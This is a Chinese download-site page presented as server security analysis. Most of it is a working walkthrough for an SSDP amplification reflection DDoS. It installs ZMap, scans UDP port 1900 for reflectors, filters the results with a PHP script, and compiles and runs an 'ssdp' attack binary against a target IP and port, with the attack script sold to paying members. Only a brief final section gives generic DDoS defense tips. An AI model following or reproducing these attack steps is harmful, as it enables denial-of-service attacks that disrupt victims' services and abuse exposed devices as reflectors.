最新公告
  • 欢迎您光临黎明资源网,本站是国内最专业的棋牌游戏和网站建设资源下载平台,拥有最全面的游戏源码、整站源码立即加入我们
  • 服务器安全防御原理刨析,SSDP放大反射扫描教程,放大列表扫描原理教程!

    服务器安全防御原理刨析,SSDP放大反射扫描教程,放大列表扫描原理教程! 最后编辑:2021-06-05

    搬瓦工注册链接:精品稳定服务器购买

    ZMap安装

    由于系统很多,不同的系统有不同的安装方法,具体如下:

     

    1、Debian 和 Ubuntu 安装命令:

    sudo apt install zmap

     

    2、Fedora、 CentOS 和 RHEL 安装命令:

    sudo yum install zmap

     

    3、macOS

    brew install zmap

     

    4、Arch Linux

    sudo pacman -S zmap

     

    SSDP放大反射攻击扫描教程,放大列表扫描教程!

    我用的是centos 64位

    先更新系统

    yum -y update

    区分centos6 centos7 执行不同的命令!

    Centos 6
    wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
    sudo rpm -Uvh epel-release-6-8.noarch.rpm
    centos 7 
    wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
    sudo rpm -Uvh epel-release-7-5.noarch.rpm
         https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-12.noarch.rpm
    

    安装必要的依赖环境!

    yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap

    上传这里的文件到你的机器!

    开始扫描SSDP放大列表

    screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt

    等扫描完成后,我们开始执行过滤!

    php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000

    然后,编译我们的攻击脚本,

    gcc -pthread ssdp.c -o ssdp
    ./ssdp <target IP> <target port> <reflection file>  <time (optional)>

    SSDP脚本下载:限时?钻石?会员5折优惠,免费更新服务。

    特别提示:新手小白慎拍!此服务只包含密钥授权和版本免费更新,不提供任何额外其他服务!

    五、总结

    DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:

    保证服务器系统的安全
    首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。

    隐藏服务器真实IP
    服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。

    另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。

    总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。
    搬瓦工注册链接:

    1. 精品稳定服务器购买

    猜你在找

    全站默认解压密码:www.lmziyuan.com 转载请注明出处:黎明资源网
    黎明资源网 » 服务器安全防御原理刨析,SSDP放大反射扫描教程,放大列表扫描原理教程!

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    注意资源默认解压密码:www.lmziyuan.com 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    新手须知!包含哪些服务?
    本站只提供资源下载分享,不提供带搭建,二次开发和修复BUG等其他服务。需要这些增值项目可咨询客服另购相应的服务!特别提示:某些资源可能需要有一定的网络基础知识,新手小白慎拍!由于资源的可复制性,下载了资源不提供任何理由退款,敬请谅解!恶意退款和不当共享会员账号将导致会员账号权限永久关闭!
    • 2021-04-21Hi,初次和大家见面了,请多关照!

    Hi, 如果你有疑问,可以跟我联系哦!

    联系作者
    • 11312会员总数(位)
    • 232资源总数(个)
    • 0本周发布(个)
    • 0 今日发布(个)
    • 1277稳定运行(天)

    提供最优质的源码资源集合

    立即查看 了解详情
    升级SVIP尊享更多特权立即升级